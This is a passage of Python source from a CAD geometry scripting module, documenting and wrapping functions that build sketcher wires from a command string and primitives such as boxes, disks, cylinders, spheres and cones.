## Create a sketcher (wire or face), following the textual description,
# passed through <VAR>theCommand</VAR> argument. \n
# Edges of the resulting wire or face will be arcs of circles and/or linear segments. \n
# Format of the description string has to be the following:
#
# "Sketcher[:F x1 y1]:CMD[:CMD[:CMD...]]"
#
# Where:
# - x1, y1 are coordinates of the first sketcher point (zero by default),
# - CMD is one of
# - "R angle" : Set the direction by angle
# - "D dx dy" : Set the direction by DX & DY
# .
# \n
# - "TT x y" : Create segment by point at X & Y
# - "T dx dy" : Create segment by point with DX & DY
# - "L length" : Create segment by direction & Length
# - "IX x" : Create segment by direction & Intersect. X
# - "IY y" : Create segment by direction & Intersect. Y
# .
# \n
# - "C radius length" : Create arc by direction, radius and length(in degree)
# - "AA x y": Create arc by point at X & Y
# - "A dx dy" : Create arc by point with DX & DY
# - "UU x y radius flag1": Create arc by point at X & Y with given radiUs
# - "U dx dy radius flag1" : Create arc by point with DX & DY with given radiUs
# - "EE x y xc yc flag1 flag2": Create arc by point at X & Y with given cEnter coordinates
# - "E dx dy dxc dyc radius flag1 flag2" : Create arc by point with DX & DY with given cEnter coordinates
# .
# \n
# - "WW" : Close Wire (to finish)
# - "WF" : Close Wire and build face (to finish)
# .
# \n
# - Flag1 (= reverse) is 0 or 2 ...
# - if 0 the drawn arc is the one of lower angle (< Pi)
# - if 2 the drawn arc is the one of greater angle (> Pi)
# .
# \n
# - Flag2 (= control tolerance) is 0 or 1 ...
# - if 0 the specified end point can be at a distance from the arc greater than the tolerance (10^-7)
# - if 1 the wire is built only if the end point is on the arc
# with a tolerance of 10^-7 on the distance else the creation fails
#
# @param theCommand String, defining the sketcher in local
# coordinates of the working plane.
# @param theWorkingPlane Nine double values, defining origin,
# OZ and OX directions of the working plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_sketcher_page "Example"
@ManageTransactions("CurvesOp")
def MakeSketcher(self, theCommand, theWorkingPlane = [0,0,0, 0,0,1, 1,0,0], theName=None):
"""
Create a sketcher (wire or face), following the textual description, passed
through theCommand argument.
Edges of the resulting wire or face will be arcs of circles and/or linear segments.
Format of the description string has to be the following:
"Sketcher[:F x1 y1]:CMD[:CMD[:CMD...]]"
Where:
- x1, y1 are coordinates of the first sketcher point (zero by default),
- CMD is one of
- "R angle" : Set the direction by angle
- "D dx dy" : Set the direction by DX & DY
- "TT x y" : Create segment by point at X & Y
- "T dx dy" : Create segment by point with DX & DY
- "L length" : Create segment by direction & Length
- "IX x" : Create segment by direction & Intersect. X
- "IY y" : Create segment by direction & Intersect. Y
- "C radius length" : Create arc by direction, radius and length(in degree)
- "AA x y": Create arc by point at X & Y
- "A dx dy" : Create arc by point with DX & DY
- "UU x y radius flag1": Create arc by point at X & Y with given radiUs
- "U dx dy radius flag1" : Create arc by point with DX & DY with given radiUs
- "EE x y xc yc flag1 flag2": Create arc by point at X & Y with given cEnter coordinates
- "E dx dy dxc dyc radius flag1 flag2" : Create arc by point with DX & DY with given cEnter coordinates
- "WW" : Close Wire (to finish)
- "WF" : Close Wire and build face (to finish)
- Flag1 (= reverse) is 0 or 2 ...
- if 0 the drawn arc is the one of lower angle (< Pi)
- if 2 the drawn arc is the one of greater angle (> Pi)
- Flag2 (= control tolerance) is 0 or 1 ...
- if 0 the specified end point can be at a distance from the arc greater than the tolerance (10^-7)
- if 1 the wire is built only if the end point is on the arc
with a tolerance of 10^-7 on the distance else the creation fails
Parameters:
theCommand String, defining the sketcher in local
coordinates of the working plane.
theWorkingPlane Nine double values, defining origin,
OZ and OX directions of the working plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created wire.
"""
# Example: see GEOM_TestAll.py
theCommand,Parameters = ParseSketcherCommand(theCommand)
anObj = self.CurvesOp.MakeSketcher(theCommand, theWorkingPlane)
RaiseIfFailed("MakeSketcher", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "wire")
return anObj
## Create a sketcher (wire or face), following the textual description,
# passed through <VAR>theCommand</VAR> argument. \n
# For format of the description string see MakeSketcher() method.\n
# @param theCommand String, defining the sketcher in local
# coordinates of the working plane.
# @param theWorkingPlane Planar Face or LCS(Marker) of the working plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_sketcher_page "Example"
@ManageTransactions("CurvesOp")
def MakeSketcherOnPlane(self, theCommand, theWorkingPlane, theName=None):
"""
Create a sketcher (wire or face), following the textual description,
passed through theCommand argument.
For format of the description string see geompy.MakeSketcher() method.
Parameters:
theCommand String, defining the sketcher in local
coordinates of the working plane.
theWorkingPlane Planar Face or LCS(Marker) of the working plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created wire.
"""
theCommand,Parameters = ParseSketcherCommand(theCommand)
anObj = self.CurvesOp.MakeSketcherOnPlane(theCommand, theWorkingPlane)
RaiseIfFailed("MakeSketcherOnPlane", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "wire")
return anObj
## Obtain a 2D sketcher interface
# @return An instance of @ref gsketcher.Sketcher2D "Sketcher2D" interface
def Sketcher2D (self):
"""
Obtain a 2D sketcher interface.
Example of usage:
sk = geompy.Sketcher2D()
sk.addPoint(20, 20)
sk.addSegmentRelative(15, 70)
sk.addSegmentPerpY(50)
sk.addArcRadiusRelative(25, 15, 14.5, 0)
sk.addArcCenterAbsolute(1, 1, 50, 50, 0, 0)
sk.addArcDirectionRadiusLength(20, 20, 101, 162.13)
sk.close()
Sketch_1 = sk.wire(geomObj_1)
"""
sk = Sketcher2D (self)
return sk
## Create a sketcher wire, following the numerical description,
# passed through <VAR>theCoordinates</VAR> argument. \n
#  @param theCoordinates double values, defining points to create a wire
#                        passing through them.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_3dsketcher_page "Example"
@ManageTransactions("CurvesOp")
def Make3DSketcher(self, theCoordinates, theName=None):
"""
Create a sketcher wire, following the numerical description,
passed through theCoordinates argument.
Parameters:
theCoordinates double values, defining points to create a wire
passing through them.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created wire.
"""
theCoordinates,Parameters = ParseParameters(theCoordinates)
anObj = self.CurvesOp.Make3DSketcher(theCoordinates)
RaiseIfFailed("Make3DSketcher", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "wire")
return anObj
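# A usage sketch (illustrative coordinates; the flat list is read as
# consecutive x,y,z triplets, here four points of a 3D polyline):
#   Wire_3D = geompy.Make3DSketcher([0,0,0, 70,0,0, 70,70,0, 0,0,130])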
## Obtain a 3D sketcher interface
# @return An instance of @ref gsketcher.Sketcher3D "Sketcher3D" interface
#
# @ref tui_3dsketcher_page "Example"
def Sketcher3D (self):
"""
Obtain a 3D sketcher interface.
Example of usage:
sk = geompy.Sketcher3D()
sk.addPointsAbsolute(0,0,0, 70,0,0)
sk.addPointsRelative(0, 0, 130)
sk.addPointAnglesLength("OXY", 50, 0, 100)
sk.addPointAnglesLength("OXZ", 30, 80, 130)
sk.close()
a3D_Sketcher_1 = sk.wire()
"""
sk = Sketcher3D (self)
return sk
## Obtain a 2D polyline creation interface
# @return An instance of @ref gsketcher.Polyline2D "Polyline2D" interface
#
# @ref tui_3dsketcher_page "Example"
def Polyline2D (self):
"""
Obtain a 2D polyline creation interface.
Example of usage:
pl = geompy.Polyline2D()
pl.addSection("section 1", GEOM.Polyline, True)
pl.addPoints(0, 0, 10, 0, 10, 10)
pl.addSection("section 2", GEOM.Interpolation, False)
pl.addPoints(20, 0, 30, 0, 30, 10)
resultObj = pl.result(WorkingPlane)
"""
pl = Polyline2D (self)
return pl
# end of l3_sketcher
## @}
## @addtogroup l3_3d_primitives
## @{
## Create a box by coordinates of two opposite vertices.
#
#  @param x1,y1,z1 double values, defining the first point.
#  @param x2,y2,z2 double values, defining the second point.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_creation_box "Example"
def MakeBox(self, x1, y1, z1, x2, y2, z2, theName=None):
"""
Create a box by coordinates of two opposite vertices.
Parameters:
x1,y1,z1 double values, defining first point.
x2,y2,z2 double values, defining second point.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestAll.py
pnt1 = self.MakeVertex(x1,y1,z1)
pnt2 = self.MakeVertex(x2,y2,z2)
# note: auto-publishing is done in self.MakeBoxTwoPnt()
return self.MakeBoxTwoPnt(pnt1, pnt2, theName)
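# A usage sketch (illustrative values; as the code above shows, this is
# equivalent to building the two corner vertices and calling MakeBoxTwoPnt):
#   Box_1 = geompy.MakeBox(0,0,0, 200,200,200, theName="Box_1")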
## Create a box with specified dimensions along the coordinate axes
# and with edges, parallel to the coordinate axes.
# Center of the box will be at point (DX/2, DY/2, DZ/2).
# @param theDX Length of Box edges, parallel to OX axis.
# @param theDY Length of Box edges, parallel to OY axis.
# @param theDZ Length of Box edges, parallel to OZ axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_creation_box "Example"
@ManageTransactions("PrimOp")
def MakeBoxDXDYDZ(self, theDX, theDY, theDZ, theName=None):
"""
Create a box with specified dimensions along the coordinate axes
and with edges, parallel to the coordinate axes.
Center of the box will be at point (DX/2, DY/2, DZ/2).
Parameters:
theDX Length of Box edges, parallel to OX axis.
theDY Length of Box edges, parallel to OY axis.
theDZ Length of Box edges, parallel to OZ axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestAll.py
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.PrimOp.MakeBoxDXDYDZ(theDX, theDY, theDZ)
RaiseIfFailed("MakeBoxDXDYDZ", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "box")
return anObj
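# A usage sketch (illustrative dimensions; one box corner sits at the origin):
#   Box_2 = geompy.MakeBoxDXDYDZ(100., 50., 25., theName="Box_2")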
## Create a box with two specified opposite vertices,
# and with edges, parallel to the coordinate axes
# @param thePnt1 First of two opposite vertices.
# @param thePnt2 Second of two opposite vertices.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_creation_box "Example"
@ManageTransactions("PrimOp")
def MakeBoxTwoPnt(self, thePnt1, thePnt2, theName=None):
"""
Create a box with two specified opposite vertices,
and with edges, parallel to the coordinate axes
Parameters:
thePnt1 First of two opposite vertices.
thePnt2 Second of two opposite vertices.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeBoxTwoPnt(thePnt1, thePnt2)
RaiseIfFailed("MakeBoxTwoPnt", self.PrimOp)
self._autoPublish(anObj, theName, "box")
return anObj
## Create a face with specified dimensions with edges parallel to coordinate axes.
# @param theH height of Face.
# @param theW width of Face.
# @param theOrientation face orientation: 1-OXY, 2-OYZ, 3-OZX
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("PrimOp")
def MakeFaceHW(self, theH, theW, theOrientation, theName=None):
"""
Create a face with specified dimensions with edges parallel to coordinate axes.
Parameters:
theH height of Face.
theW width of Face.
theOrientation face orientation: 1-OXY, 2-OYZ, 3-OZX
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
theH,theW,Parameters = ParseParameters(theH, theW)
anObj = self.PrimOp.MakeFaceHW(theH, theW, theOrientation)
RaiseIfFailed("MakeFaceHW", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "rectangle")
return anObj
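# A usage sketch (illustrative: a 100x80 rectangle lying in the OXY plane,
# selected by theOrientation=1):
#   Face_1 = geompy.MakeFaceHW(100., 80., 1, theName="Face_1")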
## Create a face from another plane and two sizes,
#  vertical size and horizontal size.
#  @param theObj Normal vector to the face being created, or
#                the face object.
#  @param theH Height (vertical size).
#  @param theW Width (horizontal size).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("PrimOp")
def MakeFaceObjHW(self, theObj, theH, theW, theName=None):
"""
Create a face from another plane and two sizes,
vertical size and horizontal size.
Parameters:
theObj Normal vector to the face being created, or
the face object.
theH Height (vertical size).
theW Width (horizontal size).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
theH,theW,Parameters = ParseParameters(theH, theW)
anObj = self.PrimOp.MakeFaceObjHW(theObj, theH, theW)
RaiseIfFailed("MakeFaceObjHW", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "rectangle")
return anObj
## Create a disk with given center, normal vector and radius.
# @param thePnt Disk center.
# @param theVec Vector, normal to the plane of the disk.
# @param theR Disk radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created disk.
#
# @ref tui_creation_disk "Example"
@ManageTransactions("PrimOp")
def MakeDiskPntVecR(self, thePnt, theVec, theR, theName=None):
"""
Create a disk with given center, normal vector and radius.
Parameters:
thePnt Disk center.
theVec Vector, normal to the plane of the disk.
theR Disk radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created disk.
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeDiskPntVecR(thePnt, theVec, theR)
RaiseIfFailed("MakeDiskPntVecR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "disk")
return anObj
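# A usage sketch (illustrative: a disk of radius 50 at the origin, normal
# to OZ; assumes the MakeVertex/MakeVectorDXDYDZ helpers defined earlier
# in this module):
#   p0     = geompy.MakeVertex(0, 0, 0)
#   vz     = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   Disk_1 = geompy.MakeDiskPntVecR(p0, vz, 50.)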
## Create a disk, passing through three given points
# @param thePnt1,thePnt2,thePnt3 Points, defining the disk.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created disk.
#
# @ref tui_creation_disk "Example"
@ManageTransactions("PrimOp")
def MakeDiskThreePnt(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create a disk, passing through three given points
Parameters:
thePnt1,thePnt2,thePnt3 Points, defining the disk.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created disk.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeDiskThreePnt(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeDiskThreePnt", self.PrimOp)
self._autoPublish(anObj, theName, "disk")
return anObj
## Create a disk with specified dimensions along OX-OY coordinate axes.
# @param theR Radius of Face.
#  @param theOrientation disk orientation: 1-OXY, 2-OYZ, 3-OZX
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created disk.
#
# @ref tui_creation_face "Example"
@ManageTransactions("PrimOp")
def MakeDiskR(self, theR, theOrientation, theName=None):
"""
Create a disk with specified dimensions along OX-OY coordinate axes.
Parameters:
theR Radius of Face.
theOrientation disk orientation: 1-OXY, 2-OYZ, 3-OZX
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created disk.
Example of usage:
Disk3 = geompy.MakeDiskR(100., 1)
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeDiskR(theR, theOrientation)
RaiseIfFailed("MakeDiskR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "disk")
return anObj
## Create a cylinder with given base point, axis, radius and height.
# @param thePnt Central point of cylinder base.
# @param theAxis Cylinder axis.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinder(self, thePnt, theAxis, theR, theH, theName=None):
"""
Create a cylinder with given base point, axis, radius and height.
Parameters:
thePnt Central point of cylinder base.
theAxis Cylinder axis.
theR Cylinder radius.
theH Cylinder height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
theR,theH,Parameters = ParseParameters(theR, theH)
anObj = self.PrimOp.MakeCylinderPntVecRH(thePnt, theAxis, theR, theH)
RaiseIfFailed("MakeCylinderPntVecRH", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
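# A usage sketch (illustrative: radius 25, height 100, axis along OZ;
# point and vector helpers as above):
#   p0    = geompy.MakeVertex(0, 0, 0)
#   vz    = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   Cyl_1 = geompy.MakeCylinder(p0, vz, 25., 100.)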
## Create a portion of cylinder with given base point, axis, radius, height and angle.
# @param thePnt Central point of cylinder base.
# @param theAxis Cylinder axis.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theA Cylinder angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinderA(self, thePnt, theAxis, theR, theH, theA, theName=None):
"""
Create a portion of cylinder with given base point, axis, radius, height and angle.
Parameters:
thePnt Central point of cylinder base.
theAxis Cylinder axis.
theR Cylinder radius.
theH Cylinder height.
theA Cylinder angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
flag = False
if isinstance(theA,str):
flag = True
theR,theH,theA,Parameters = ParseParameters(theR, theH, theA)
if flag:
theA = theA*math.pi/180.
anObj = self.PrimOp.MakeCylinderPntVecRHA(thePnt, theAxis, theR, theH, theA)
RaiseIfFailed("MakeCylinderPntVecRHA", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
## Create a cylinder with given radius and height at
# the origin of coordinate system. Axis of the cylinder
# will be collinear to the OZ axis of the coordinate system.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinderRH(self, theR, theH, theName=None):
"""
Create a cylinder with given radius and height at
the origin of coordinate system. Axis of the cylinder
will be collinear to the OZ axis of the coordinate system.
Parameters:
theR Cylinder radius.
theH Cylinder height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
theR,theH,Parameters = ParseParameters(theR, theH)
anObj = self.PrimOp.MakeCylinderRH(theR, theH)
RaiseIfFailed("MakeCylinderRH", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
## Create a portion of cylinder with given radius, height and angle at
# the origin of coordinate system. Axis of the cylinder
# will be collinear to the OZ axis of the coordinate system.
# @param theR Cylinder radius.
# @param theH Cylinder height.
# @param theA Cylinder angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cylinder.
#
# @ref tui_creation_cylinder "Example"
@ManageTransactions("PrimOp")
def MakeCylinderRHA(self, theR, theH, theA, theName=None):
"""
Create a portion of cylinder with given radius, height and angle at
the origin of coordinate system. Axis of the cylinder
will be collinear to the OZ axis of the coordinate system.
Parameters:
theR Cylinder radius.
theH Cylinder height.
theA Cylinder angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created cylinder.
"""
# Example: see GEOM_TestAll.py
flag = False
if isinstance(theA,str):
flag = True
theR,theH,theA,Parameters = ParseParameters(theR, theH, theA)
if flag:
theA = theA*math.pi/180.
anObj = self.PrimOp.MakeCylinderRHA(theR, theH, theA)
RaiseIfFailed("MakeCylinderRHA", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cylinder")
return anObj
## Create a sphere with given center and radius.
# @param thePnt Sphere center.
# @param theR Sphere radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created sphere.
#
# @ref tui_creation_sphere "Example"
@ManageTransactions("PrimOp")
def MakeSpherePntR(self, thePnt, theR, theName=None):
"""
Create a sphere with given center and radius.
Parameters:
thePnt Sphere center.
theR Sphere radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created sphere.
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeSpherePntR(thePnt, theR)
RaiseIfFailed("MakeSpherePntR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "sphere")
return anObj
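# A usage sketch (illustrative center and radius):
#   center   = geompy.MakeVertex(10, 10, 10)
#   Sphere_1 = geompy.MakeSpherePntR(center, 30.)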
## Create a sphere with given center and radius.
# @param x,y,z Coordinates of sphere center.
# @param theR Sphere radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created sphere.
#
# @ref tui_creation_sphere "Example"
def MakeSphere(self, x, y, z, theR, theName=None):
"""
Create a sphere with given center and radius.
Parameters:
x,y,z Coordinates of sphere center.
theR Sphere radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created sphere.
"""
# Example: see GEOM_TestAll.py
point = self.MakeVertex(x, y, z)
# note: auto-publishing is done in self.MakeSpherePntR()
anObj = self.MakeSpherePntR(point, theR, theName)
return anObj
## Create a sphere with given radius at the origin of coordinate system.
# @param theR Sphere radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created sphere.
#
# @ref tui_creation_sphere "Example"
@ManageTransactions("PrimOp")
def MakeSphereR(self, theR, theName=None):
"""
Create a sphere with given radius at the origin of coordinate system.
Parameters:
theR Sphere radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created sphere.
"""
# Example: see GEOM_TestAll.py
theR,Parameters = ParseParameters(theR)
anObj = self.PrimOp.MakeSphereR(theR)
RaiseIfFailed("MakeSphereR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "sphere")
return anObj
## Create a cone with given base point, axis, height and radiuses.
# @param thePnt Central point of the first cone base.
# @param theAxis Cone axis.
# @param theR1 Radius of the first cone base.
# @param theR2 Radius of the second cone base.
# \note If both radiuses are non-zero, the cone will be truncated.
# \note If the radiuses are equal, a cylinder will be created instead.
# @param theH Cone height.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cone.
#
# @ref tui_creation_cone "Example"
@ManageTransactions("PrimOp")
def MakeCone(self, thePnt, theAxis, theR1, theR2, theH, theName=None):
"""
Create a cone with given base point, axis, height and radiuses.
Parameters:
thePnt Central point of the first cone base.
theAxis Cone axis.
theR1 Radius of the first cone base.
theR2 Radius of the second cone base.
theH Cone height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
If both radiuses are non-zero, the cone will be truncated.
If the radiuses are equal, a cylinder will be created instead.
Returns:
New GEOM.GEOM_Object, containing the created cone.
"""
# Example: see GEOM_TestAll.py
theR1,theR2,theH,Parameters = ParseParameters(theR1,theR2,theH)
anObj = self.PrimOp.MakeConePntVecR1R2H(thePnt, theAxis, theR1, theR2, theH)
RaiseIfFailed("MakeConePntVecR1R2H", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cone")
return anObj
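# A usage sketch (illustrative: a truncated cone along OZ; per the notes
# above, theR2=0 would give a sharp cone and equal radiuses a cylinder):
#   p0     = geompy.MakeVertex(0, 0, 0)
#   vz     = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   Cone_1 = geompy.MakeCone(p0, vz, 50., 20., 100.)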
## Create a cone with given height and radiuses at
# the origin of coordinate system. Axis of the cone will
# be collinear to the OZ axis of the coordinate system.
# @param theR1 Radius of the first cone base.
# @param theR2 Radius of the second cone base.
# \note If both radiuses are non-zero, the cone will be truncated.
# \note If the radiuses are equal, a cylinder will be created instead.
# @param theH Cone height.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cone.
#
# @ref tui_creation_cone "Example"
@ManageTransactions("PrimOp")
def MakeConeR1R2H(self, theR1, theR2, theH, theName=None):
"""
Create a cone with given height and radiuses at
the origin of coordinate system. Axis of the cone will
be collinear to the OZ axis of the coordinate system.
Parameters:
theR1 Radius of the first cone base.
theR2 Radius of the second cone base.
theH Cone height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
If both radiuses are non-zero, the cone will be truncated.
If the radiuses are equal, a cylinder will be created instead.
Returns:
New GEOM.GEOM_Object, containing the created cone.
"""
# Example: see GEOM_TestAll.py
theR1,theR2,theH,Parameters = ParseParameters(theR1,theR2,theH)
anObj = self.PrimOp.MakeConeR1R2H(theR1, theR2, theH)
RaiseIfFailed("MakeConeR1R2H", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cone")
return anObj
## Create a torus with given center, normal vector and radiuses.
# @param thePnt Torus central point.
# @param theVec Torus axis of symmetry.
# @param theRMajor Torus major radius.
# @param theRMinor Torus minor radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created torus.
#
# @ref tui_creation_torus "Example"
@ManageTransactions("PrimOp")
def MakeTorus(self, thePnt, theVec, theRMajor, theRMinor, theName=None):
"""
Create a torus with given center, normal vector and radiuses.
Parameters:
thePnt Torus central point.
theVec Torus axis of symmetry.
theRMajor Torus major radius.
theRMinor Torus minor radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created torus.
"""
# Example: see GEOM_TestAll.py
theRMajor,theRMinor,Parameters = ParseParameters(theRMajor,theRMinor)
anObj = self.PrimOp.MakeTorusPntVecRR(thePnt, theVec, theRMajor, theRMinor)
RaiseIfFailed("MakeTorusPntVecRR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "torus")
return anObj
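# A usage sketch (illustrative: major radius 100, minor radius 20, axis OZ):
#   p0      = geompy.MakeVertex(0, 0, 0)
#   vz      = geompy.MakeVectorDXDYDZ(0, 0, 1)
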